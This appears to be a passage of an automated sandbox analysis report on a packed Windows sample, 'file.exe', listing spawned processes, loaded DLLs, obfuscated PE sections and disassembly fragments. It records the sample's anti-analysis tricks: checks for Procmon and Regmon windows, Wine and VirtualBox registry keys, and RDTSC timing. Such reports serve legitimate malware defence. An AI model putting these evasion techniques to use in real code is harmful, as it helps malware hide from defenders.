          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,4249164096274677999,9181346475388211576,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1916,i,2138066403308314358,10443051361612717293,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: file.exeStatic file information: File size 1845760 > 1048576
          Source: file.exeStatic PE information: Raw size of obdpnpls is bigger than: 0x100000 < 0x198a00
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.1727782291.0000000006582000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1617339580.00000000084E0000.00000004.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;obdpnpls:EW;nxyctjky:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;obdpnpls:EW;nxyctjky:EW;.taggant:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: file.exeStatic PE information: real checksum: 0x1c983c should be: 0x1d0369
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: obdpnpls
          Source: file.exeStatic PE information: section name: nxyctjky
          Source: file.exeStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05BA1070 push ds; iretd 0_3_05BA0F84
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05BA1070 push ds; iretd 0_3_05BA0F84
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05BA1070 push ds; iretd 0_3_05BA0F84
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013732E6 push edi; ret 0_3_01373303
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01373ACE push esp; iretd 0_3_01373ACF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01354B27 push cs; iretd 0_3_01354B28
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01349022 push eax; ret 0_3_01349C9C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0134CDB8 pushad ; ret 0_3_0134CDCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01355897 push ds; retf 0_3_01355898
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013732E6 push edi; ret 0_3_01373303
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01373ACE push esp; iretd 0_3_01373ACF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B9CCEE push edi; ret 0_3_05B9CD0B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B9D4D6 push esp; iretd 0_3_05B9D4D7
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05BA1070 push ds; iretd 0_3_05BA0F84
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013834A9 push es; iretd 0_3_0138351C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01384369 push cs; retf 0_3_0138437C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0658E475 push 6F64161Eh; mov dword ptr [esp], esi0_2_0658F291
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06592B1C push eax; mov dword ptr [esp], ebx0_2_06593678
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0658EB0B push 6864B1CAh; mov dword ptr [esp], edi0_2_0658EB1E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0658EB0B push edi; mov dword ptr [esp], edx0_2_0658F159
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0658BE5B push edi; mov dword ptr [esp], ecx0_2_0658BFA7
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06591E47 push ebp; mov dword ptr [esp], ecx0_2_06594E86
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659061F push eax; mov dword ptr [esp], edx0_2_06592C21
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659061F push ecx; mov dword ptr [esp], esi0_2_06594B33
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659061F push ebx; mov dword ptr [esp], esi0_2_0659555F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0658BE03 push es; iretd 0_2_0658BE0A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06590E02 push 1401AFBEh; mov dword ptr [esp], edx0_2_06590E15
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0658E605 push edi; mov dword ptr [esp], ebx0_2_0658ECAD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06590E33 push esi; mov dword ptr [esp], ebx0_2_06594155
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06590EFF push 7E7F4000h; mov dword ptr [esp], edx0_2_06593772
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06592EEE push eax; mov dword ptr [esp], edx0_2_06592EF9
          Source: file.exeStatic PE information: section name: entropy: 7.979884343292066
          Source: file.exeStatic PE information: section name: obdpnpls entropy: 7.954366590054844

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A898 second address: 82A89C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EE91 second address: 82EEA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE1C8D96871h 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EEA9 second address: 82EEC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC1h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F007 second address: 82F00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F00D second address: 82F01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jnc 00007FE1C8D8FEB6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83176F second address: 831793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831793 second address: 831798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831798 second address: 8317BD instructions: 0x00000000 rdtsc 0x00000002 js 00007FE1C8D96871h 0x00000008 jmp 00007FE1C8D9686Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 jo 00007FE1C8D96868h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831816 second address: 83181C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83181C second address: 8318EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FE1C8D9686Ah 0x0000000e push 00000000h 0x00000010 jo 00007FE1C8D96867h 0x00000016 cmc 0x00000017 call 00007FE1C8D96869h 0x0000001c jmp 00007FE1C8D9686Dh 0x00000021 push eax 0x00000022 jmp 00007FE1C8D96872h 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b jp 00007FE1C8D9686Eh 0x00000031 mov eax, dword ptr [eax] 0x00000033 jmp 00007FE1C8D96879h 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c jo 00007FE1C8D96889h 0x00000042 pushad 0x00000043 jmp 00007FE1C8D96874h 0x00000048 jmp 00007FE1C8D9686Dh 0x0000004d popad 0x0000004e pop eax 0x0000004f mov edi, dword ptr [ebp+122D2BF1h] 0x00000055 push 00000003h 0x00000057 mov ecx, dword ptr [ebp+122D29D9h] 0x0000005d mov si, 0991h 0x00000061 push 00000000h 0x00000063 sub edx, dword ptr [ebp+122D2955h] 0x00000069 push 00000003h 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1793h], eax 0x00000072 popad 0x00000073 call 00007FE1C8D96869h 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8318EE second address: 83199C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jns 00007FE1C8D8FEB6h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FE1C8D8FEC9h 0x00000016 js 00007FE1C8D8FEB8h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 jmp 00007FE1C8D8FEBCh 0x00000029 js 00007FE1C8D8FEB8h 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 mov eax, dword ptr [eax] 0x00000034 jmp 00007FE1C8D8FEC0h 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d jmp 00007FE1C8D8FEC5h 0x00000042 pop eax 0x00000043 mov dword ptr [ebp+122D181Ah], edi 0x00000049 lea ebx, dword ptr [ebp+12448675h] 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007FE1C8D8FEB8h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 00000017h 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 push eax 0x0000006a push ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d jnp 00007FE1C8D8FEB6h 0x00000073 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831A6F second address: 831ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jo 00007FE1C8D96866h 0x0000000c pop esi 0x0000000d popad 0x0000000e xor dword ptr [esp], 0B6E83BBh 0x00000015 jo 00007FE1C8D96869h 0x0000001b xor ch, 00000000h 0x0000001e push 00000003h 0x00000020 mov ecx, edx 0x00000022 push 00000000h 0x00000024 mov edx, dword ptr [ebp+122D295Dh] 0x0000002a mov esi, dword ptr [ebp+122D2C35h] 0x00000030 push 00000003h 0x00000032 call 00007FE1C8D96869h 0x00000037 push eax 0x00000038 push ecx 0x00000039 jmp 00007FE1C8D9686Ah 0x0000003e pop ecx 0x0000003f pop eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831ABE second address: 831AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831AC2 second address: 831AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE1C8D96873h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831AE2 second address: 831AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jp 00007FE1C8D8FEB6h 0x00000015 pop edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831AF8 second address: 831B39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE1C8D96876h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FE1C8D9687Fh 0x00000017 jmp 00007FE1C8D96879h 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831BB0 second address: 831BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831BB4 second address: 831C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jns 00007FE1C8D96866h 0x00000011 popad 0x00000012 pop ebx 0x00000013 nop 0x00000014 mov edi, dword ptr [ebp+122D35F9h] 0x0000001a push 00000000h 0x0000001c call 00007FE1C8D96870h 0x00000021 movzx edx, cx 0x00000024 pop ecx 0x00000025 push 298DF5DEh 0x0000002a push ecx 0x0000002b jg 00007FE1C8D96868h 0x00000031 pushad 0x00000032 popad 0x00000033 pop ecx 0x00000034 xor dword ptr [esp], 298DF55Eh 0x0000003b add edx, dword ptr [ebp+122D2705h] 0x00000041 push 00000003h 0x00000043 mov dword ptr [ebp+122D2856h], ecx 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push esi 0x0000004e call 00007FE1C8D96868h 0x00000053 pop esi 0x00000054 mov dword ptr [esp+04h], esi 0x00000058 add dword ptr [esp+04h], 0000001Ch 0x00000060 inc esi 0x00000061 push esi 0x00000062 ret 0x00000063 pop esi 0x00000064 ret 0x00000065 push 00000003h 0x00000067 mov esi, dword ptr [ebp+122D18F1h] 0x0000006d movzx edx, ax 0x00000070 push 6F0839A0h 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 jne 00007FE1C8D96866h 0x0000007e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831C47 second address: 831C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843BC7 second address: 843BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843BCB second address: 843BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843BD5 second address: 843BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850964 second address: 85096E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE1C8D8FEB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85096E second address: 850972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850972 second address: 85097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850B12 second address: 850B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE1C8D96876h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8511C8 second address: 8511DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D8FEC0h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822083 second address: 8220AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FE1C8D96870h 0x0000000a jmp 00007FE1C8D9686Bh 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8220AB second address: 8220C3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE1C8D8FEB6h 0x00000008 ja 00007FE1C8D8FEB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FE1C8D8FEBCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
